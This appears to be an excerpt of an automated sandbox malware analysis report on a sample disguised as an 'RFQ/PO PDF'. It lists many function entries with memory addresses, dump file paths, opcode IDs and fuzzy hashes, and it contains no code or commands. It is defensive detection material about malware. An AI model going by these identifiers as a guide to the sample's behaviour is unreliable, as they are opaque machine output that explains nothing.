                                            • Opcode ID: b3dc160ff4ad2add48f86d5bacd01561f8e33e68c56e131838003aec0f099404
                                            • Instruction ID: 696ef101e974750181d6636126398f9d92a64e60a5390488167b20310c875d7c
                                            • Opcode Fuzzy Hash: b3dc160ff4ad2add48f86d5bacd01561f8e33e68c56e131838003aec0f099404
                                            • Instruction Fuzzy Hash: C1E0E574E05208EFCB94DFA8D940AACFBF5EB88310F10D4AA9919A3350DB359A55DF80
                                            Function 061F7608 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8a0dc2058aa4e70f642a92250958605252c5a4ab4d0ac44323888624761a17f8
                                            • Instruction ID: a68ab86385140bff2c8e6f188d49938a7635dc86a6ddd3dde485fce4b6c88db4
                                            • Opcode Fuzzy Hash: 8a0dc2058aa4e70f642a92250958605252c5a4ab4d0ac44323888624761a17f8
                                            • Instruction Fuzzy Hash: E1E0E574E05208EFCB84DFA8E550AACFBF4EB88310F10C0A9991893340E7319A02DF80
                                            Function 061F1D30 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4165181c3e625fa9a05da057bda3653f58c0843367371917f6deda5479804b9e
                                            • Instruction ID: eb4b26c0ed7af14cedda8847f959e071b92c4c767856b64d857709df45cc42df
                                            • Opcode Fuzzy Hash: 4165181c3e625fa9a05da057bda3653f58c0843367371917f6deda5479804b9e
                                            • Instruction Fuzzy Hash: 19E0263051D146FFC70ACB64C5625687F719BDB314F1484C9C818473A3C6368E03C741
                                            Function 061F8298 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0b2c028c2bb35218424c1d1382a721e731f470df2d05675864746f5507b51577
                                            • Instruction ID: ef963178484f7681dced09b2c82f2a11ad509d0ba5c457fa0f4878fb2bc12d03
                                            • Opcode Fuzzy Hash: 0b2c028c2bb35218424c1d1382a721e731f470df2d05675864746f5507b51577
                                            • Instruction Fuzzy Hash: 9AE01A70D0620CEFCB84DFB8D4446ADBBF5EB48301F1084A9D904A7310D7756A50EF80
                                            Function 05F5CDB8 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e12f22125fb53e954d032b488f9bee75536aef199b528cc5054c337db9eed56a
                                            • Instruction ID: 78ae9b1d84f46b7ae4430c45d19f0261bb214e0c3dadf1f748a4400c240ef07e
                                            • Opcode Fuzzy Hash: e12f22125fb53e954d032b488f9bee75536aef199b528cc5054c337db9eed56a
                                            • Instruction Fuzzy Hash: B2E0E574E09208EFCB84DFA8D5516ACFBF5EB88310F10C0A99919E3344D635AE02DF80
                                            Function 05F5A350 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6ed5f9625af6c1308a73a3113d7719267b627caa6099e4bb9bebab919bd7c301
                                            • Instruction ID: 811141eb65c6b021549ca542fb36c7b24ea9875fb380f0698f825bd9c9fad209
                                            • Opcode Fuzzy Hash: 6ed5f9625af6c1308a73a3113d7719267b627caa6099e4bb9bebab919bd7c301
                                            • Instruction Fuzzy Hash: F8E0E570D09208EFCB44DFA8D4006ADBBB9EB88315F5081A99958A3710D7355A51DF81
                                            Function 05F5C2D0 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e12f22125fb53e954d032b488f9bee75536aef199b528cc5054c337db9eed56a
                                            • Instruction ID: 576271e4036e3d61f1748d3a51e85a391a504114eacdb697b824f0f24fcdcc23
                                            • Opcode Fuzzy Hash: e12f22125fb53e954d032b488f9bee75536aef199b528cc5054c337db9eed56a
                                            • Instruction Fuzzy Hash: E2E0C274E09208AFCB84DFA9D5416ACBBF5AB89310F5080A99819A3340D6359A01DF80
                                            Function 063B8D20 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766732874.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_63a0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: edc06f00b0d7fec62c2b527fc9ea7ef8b61127fb6025a550bf02b7eb00ba09ac
                                            • Instruction ID: 985576056b77fa8673fda664a076aaf165dd14c6592c4cd4aa49f201fb958530
                                            • Opcode Fuzzy Hash: edc06f00b0d7fec62c2b527fc9ea7ef8b61127fb6025a550bf02b7eb00ba09ac
                                            • Instruction Fuzzy Hash: 5FE0E574E05208EFCB84DFA8D5406ACFBF8EB88310F10C0AA981897340D7319A01DF80
                                            Function 063BDD98 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766732874.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_63a0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 43e4cacd3831b6f2b68e35d75324e22ee80e314056062508e05fd5c662425768
                                            • Instruction ID: 60152e7bdaaf15998ff18a749a8f3bd740cf7074e76e1e7fd300c7ef4440562f
                                            • Opcode Fuzzy Hash: 43e4cacd3831b6f2b68e35d75324e22ee80e314056062508e05fd5c662425768
                                            • Instruction Fuzzy Hash: 55E04F70D0920CDFD744EFA8E4056ADBFB49F45311F1040A9D988A3790DA341A40DB91
                                            Function 061FDC60 Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 09ffa9a9e9c63923b42ce83a8776d8845d8236d1c35b2a9ccb78a61c6134961a
                                            • Instruction ID: 528726d403b2421b18e05bd5e9f408100c9aba75e24f9220b8e5d40b906b4a6d
                                            • Opcode Fuzzy Hash: 09ffa9a9e9c63923b42ce83a8776d8845d8236d1c35b2a9ccb78a61c6134961a
                                            • Instruction Fuzzy Hash: 6EE0E574D09208EFCB44DFA8D550AACFBB5AB88310F10C1AA995857351C7719A51EB80
                                            Function 061FB84C Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e05328fbba5d47da03c45e0f66170a5a3d38af181d8c8d80b44c534ee0098cf8
                                            • Instruction ID: 71e7c6aff7e545bf937812a90973764cf695a2299428866e6729786488f2a346
                                            • Opcode Fuzzy Hash: e05328fbba5d47da03c45e0f66170a5a3d38af181d8c8d80b44c534ee0098cf8
                                            • Instruction Fuzzy Hash: 3EF098B4D451188FDB94DF64C994ADCB7F5AF48304F50849A850DA7245DB31AE86CF00
                                            Function 05F5A558 Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b52d25641c84f916a5b61a56cbed0b19f44cc7015d8687cd100a9e984cca45e5
                                            • Instruction ID: 1cd3a889d3b4e039fde31725fa607c87f13884490cfc7f287b77b03552f89dca
                                            • Opcode Fuzzy Hash: b52d25641c84f916a5b61a56cbed0b19f44cc7015d8687cd100a9e984cca45e5
                                            • Instruction Fuzzy Hash: C7E01A34909208EFCB44DFA4D844EACBBB9BB49322F508198E94527320C7319E60EB80
                                            Function 05F5D51B Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3766a4c44606009d0bce4b7a1f8013ebc1ed729be1449b837c5409f72d3cac0d
                                            • Instruction ID: 69f1848164aba2fdc2cf23f36d03e20ab64865bc426f9b1d7e2db8ad7f58acfe
                                            • Opcode Fuzzy Hash: 3766a4c44606009d0bce4b7a1f8013ebc1ed729be1449b837c5409f72d3cac0d
                                            • Instruction Fuzzy Hash: 3CE0867990110DFFDB00DBA4E94274D7BF5DB45305F608455E408D3345E9396E005750
                                            Function 05F5A020 Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 934ec4a5f4fd66f80134c1641405cb102c8d18eb0e766fd8780f2bbdc8d93a91
                                            • Instruction ID: fc87c77be89b4af526b3c45ab9644f23d970cf292801025db1e02049c88b4281
                                            • Opcode Fuzzy Hash: 934ec4a5f4fd66f80134c1641405cb102c8d18eb0e766fd8780f2bbdc8d93a91
                                            • Instruction Fuzzy Hash: B7E01A70D09208EFCB44EFA8D4106ACBBB5BB88311F1081A9C85897300D7395A50DF40
                                            Function 063BEFC8 Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766732874.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_63a0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f4b39abc93f45b64c7e8183bf519ef3637eccb277989dd54fde4207fa422849a
                                            • Instruction ID: 2bfe6ffd4ee76e198d5bb0580d174cee51bae2cd5c452d773ef4d7441bb100aa
                                            • Opcode Fuzzy Hash: f4b39abc93f45b64c7e8183bf519ef3637eccb277989dd54fde4207fa422849a
                                            • Instruction Fuzzy Hash: 84E04F7490910CABC744DF98E9509EDBBB8AB89311F109099A94457341CA31AA41DB90
                                            Function 061FCE64 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e9b8670f89e946485a7911d909568b7a53732d057238ab13a048b2a986888bf2
                                            • Instruction ID: 1b6907cde10a74ee3997e9f5860bdb48e36ff026cba62bbf3f7a1adb07dbeebf
                                            • Opcode Fuzzy Hash: e9b8670f89e946485a7911d909568b7a53732d057238ab13a048b2a986888bf2
                                            • Instruction Fuzzy Hash: 29E065B49012189FDB91DF94C854FEE7BBABB08310F0040D5E289A7381DA385A84DFA0
                                            Function 061F57EA Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c8be00a2656a78caf2d1a4afc9e431cdba8fb2a3963c0557053dd116ae82ca4c
                                            • Instruction ID: 3633d36cbc403de2808bc917dce6f7c0f953be28cce2fdb36a57dd43596038c3
                                            • Opcode Fuzzy Hash: c8be00a2656a78caf2d1a4afc9e431cdba8fb2a3963c0557053dd116ae82ca4c
                                            • Instruction Fuzzy Hash: AFF0D474A112188FDB90DF24E8A9B99B7B1BB49300F5041E6D40AA7644EB315E80CF00
                                            Function 061F8440 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ffb1243536f7591e0fa29bf4f898d85a888d032fb6f0ef23c1efe7595ccc87f0
                                            • Instruction ID: 15a3591bad9f48407782056552b321d223e4753cf389d39f13a6e1f47e5e7de6
                                            • Opcode Fuzzy Hash: ffb1243536f7591e0fa29bf4f898d85a888d032fb6f0ef23c1efe7595ccc87f0
                                            • Instruction Fuzzy Hash: E1E0127084A10CEBC744DBA4E911ABDBFBC9B8A301F5085A9990467254D7305A50EBB5
                                            Function 061F9A60 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9e0eb31fe20405c367a72397f5fb337097cf2d8cb4d360c39fe04e92f9f398c3
                                            • Instruction ID: 32a08db43386acbefb4170e3a5ce322c81b5e10978d7d1908eb7130e67ae70d1
                                            • Opcode Fuzzy Hash: 9e0eb31fe20405c367a72397f5fb337097cf2d8cb4d360c39fe04e92f9f398c3
                                            • Instruction Fuzzy Hash: 79E04630D15208EFCB84EFA8D9416ACBBF4AB48210F2084A9890A93360EB319E41CB81
                                            Function 05F5B840 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6d805d7f65a46ceed25f273d5c2ea431d00cc4533e77fe57766ee0c9fc12399c
                                            • Instruction ID: b3435cd92b71ba750a801216a986607e6f47e417a2beb1df777d0a68a7699bb5
                                            • Opcode Fuzzy Hash: 6d805d7f65a46ceed25f273d5c2ea431d00cc4533e77fe57766ee0c9fc12399c
                                            • Instruction Fuzzy Hash: 90E04F30D09108EFC744DFA8C5406ACBBF5AB48311F1080ADCD0993341D6319A42DB40
                                            Function 05F53049 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ffd305225efc7522225d4a24f10f820802c0872b94cf823903632c4abf51c421
                                            • Instruction ID: 1d6759c8198f4d0db24443af5458a7009545816413bf92bdb3b6de9b64e33eed
                                            • Opcode Fuzzy Hash: ffd305225efc7522225d4a24f10f820802c0872b94cf823903632c4abf51c421
                                            • Instruction Fuzzy Hash: 6CF0F278D05208DFCB10DF98E484B9DBBB2FB09314F508195E809A3718DB79A984CF00
                                            Function 01185DB0 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1753535503.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_1180000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e2bad0484b8de287dac42c075da10281da455c0e342311cf3e9af096af2e861e
                                            • Instruction ID: a5a294122b30cdabf004887290871e627974dc32832d175d39101898cd4d9c04
                                            • Opcode Fuzzy Hash: e2bad0484b8de287dac42c075da10281da455c0e342311cf3e9af096af2e861e
                                            • Instruction Fuzzy Hash: 65E0DFB0810318CBEB95EF10CC8A7EFB7B4FB40300F4080E99929A3241CB309E818F51
                                            Function 05F22028 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9fd4774a9bde58971d298acc65f77202abcc8d989badca0a93cd17bd7c266c5d
                                            • Instruction ID: 4c3a1fa4231a4628f17b1fb401eef070772725252e5b68b41cda1f69a453d078
                                            • Opcode Fuzzy Hash: 9fd4774a9bde58971d298acc65f77202abcc8d989badca0a93cd17bd7c266c5d
                                            • Instruction Fuzzy Hash: 13D02B357843249BDB20AA709C01F71339E7B01611F1004A5E7065F2C0C9BAF802C352
                                            Function 063B7FD0 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766732874.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_63a0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b767c5608e8f6d44461e902e813c001ba76cb91361e2f41a436da3c59c76b5ca
                                            • Instruction ID: 7ce0e6f1d383a8ed560e0ceb4967acfdf65f63a25a7892970ddf7156fb151326
                                            • Opcode Fuzzy Hash: b767c5608e8f6d44461e902e813c001ba76cb91361e2f41a436da3c59c76b5ca
                                            • Instruction Fuzzy Hash: 12E01234D0920CEFCB44DBA9D550AACFBF8EB88310F1080AAD81857741DA319A02EB84
                                            Function 061FE630 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9770452c83a51273264f043947fef423d558627e051d3963219e206bd7c496d4
                                            • Instruction ID: 9f0699766f0656adb8f2b3586d97cdac98ad2524ffb2d1ff16489dd7f5f61d11
                                            • Opcode Fuzzy Hash: 9770452c83a51273264f043947fef423d558627e051d3963219e206bd7c496d4
                                            • Instruction Fuzzy Hash: 1AE0C234D0910CFBC708DF94D9419ACFBB6EB85320F248098D90817350CB315E02DB80
                                            Function 061F8620 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9770452c83a51273264f043947fef423d558627e051d3963219e206bd7c496d4
                                            • Instruction ID: ad03bb48d36bf0cd042bae8cfc733025445afb3c8b31bac795aa2f540d9f8963
                                            • Opcode Fuzzy Hash: 9770452c83a51273264f043947fef423d558627e051d3963219e206bd7c496d4
                                            • Instruction Fuzzy Hash: 06E0C234919108EBC748DF94D9419ACFBB4EB85325F108098D80817340CB315E02DB80
                                            Function 061F16E8 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9770452c83a51273264f043947fef423d558627e051d3963219e206bd7c496d4
                                            • Instruction ID: 294acc2a65370d4eb90106022c160e7484c6a109d7c23fbc34a3e4e9b106e715
                                            • Opcode Fuzzy Hash: 9770452c83a51273264f043947fef423d558627e051d3963219e206bd7c496d4
                                            • Instruction Fuzzy Hash: 1DE01238919208EBC748DF94D9529ACFBB9EB85315F10919DD90C17351DB316E42DB81
                                            Function 061F3478 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9770452c83a51273264f043947fef423d558627e051d3963219e206bd7c496d4
                                            • Instruction ID: e269459ca36141966db33226e66c9cb95c603cc37bbd47c885b21283328d143a
                                            • Opcode Fuzzy Hash: 9770452c83a51273264f043947fef423d558627e051d3963219e206bd7c496d4
                                            • Instruction Fuzzy Hash: 37E08C3490A108EBC708DF94D9449ACBBB9AB85310F2080D8881917340CB325E02DB80
                                            Function 061FB484 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6a6d0aad9860b4935ea35e7f5ddcfeb18269cd59346b9ca89a4b46a2f5ce8ff7
                                            • Instruction ID: fe1c48b578d5ab5140d74e5fc7542cff4b3bb25b16b06827206b6f85f6f766a7
                                            • Opcode Fuzzy Hash: 6a6d0aad9860b4935ea35e7f5ddcfeb18269cd59346b9ca89a4b46a2f5ce8ff7
                                            • Instruction Fuzzy Hash: 9EF07FB491526ACFEBA0DF18CA88B99B7F1AB04304F5184D5D10DA7344DB7A5A859F10
                                            Function 061F1D40 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9770452c83a51273264f043947fef423d558627e051d3963219e206bd7c496d4
                                            • Instruction ID: a25351efe457baa7be30ea937fff557966f593e16b92ffcae2f2b9d1f6dff0a8
                                            • Opcode Fuzzy Hash: 9770452c83a51273264f043947fef423d558627e051d3963219e206bd7c496d4
                                            • Instruction Fuzzy Hash: FBE01234909108EBCB48DF94D9559ACFBB5EBC5315F108199D91817351CB315E42DB91
                                            Function 061F85D8 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cc244337b4959c318fae9ae13800fe4c4e05115fe3f5c696a6083c858676b3ec
                                            • Instruction ID: 85a2dc35d32e341ea0485899da94d4dba6d520be8049ac451270ce2c4257e932
                                            • Opcode Fuzzy Hash: cc244337b4959c318fae9ae13800fe4c4e05115fe3f5c696a6083c858676b3ec
                                            • Instruction Fuzzy Hash: A0E0C2B1802108EBC741FBB5D80459D77F9DB45215F8084A5C50593120EF314A00D791
                                            Function 061F8DC8 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9770452c83a51273264f043947fef423d558627e051d3963219e206bd7c496d4
                                            • Instruction ID: 9022abdee392b445e45c95c09662d795c1c8715829ff74acbf25bc8273f4424a
                                            • Opcode Fuzzy Hash: 9770452c83a51273264f043947fef423d558627e051d3963219e206bd7c496d4
                                            • Instruction Fuzzy Hash: 4CE0123490910CEBC748DF94D9519ACFBB9EF85315F20819DD90817395CB315E42DB81
                                            Function 061F4A00 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9770452c83a51273264f043947fef423d558627e051d3963219e206bd7c496d4
                                            • Instruction ID: 906fe4cb07c513c993ebbdc7851d0c92a2d5b769b5708856c1191a442829dcfd
                                            • Opcode Fuzzy Hash: 9770452c83a51273264f043947fef423d558627e051d3963219e206bd7c496d4
